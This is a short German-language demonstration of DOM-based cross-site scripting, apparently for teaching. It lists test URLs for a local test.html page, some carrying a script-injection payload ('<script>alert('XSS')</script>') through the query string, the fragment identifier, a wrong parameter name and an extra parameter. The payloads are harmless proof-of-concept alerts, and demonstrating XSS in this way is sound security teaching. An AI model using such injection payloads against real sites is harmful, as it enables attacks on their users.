Demonstration für DOM-basiertes XSS

Zuerst mit Namen:

./test.html?name=Carsten

Dann mit normalem XSS:

./test.html?name=<script>alert('XSS')</script>

Dann als Fragmentbezeichner:

./test.html?name#<script>alert('XSS')</script>

Dann mit falschem Parameter:

./test.html?noname=<script>alert('XSS')</script>

Und mit zusätzlichem Parameter:

./test.html?nix=name=<script>alert('XSS')</script>&name=Carsten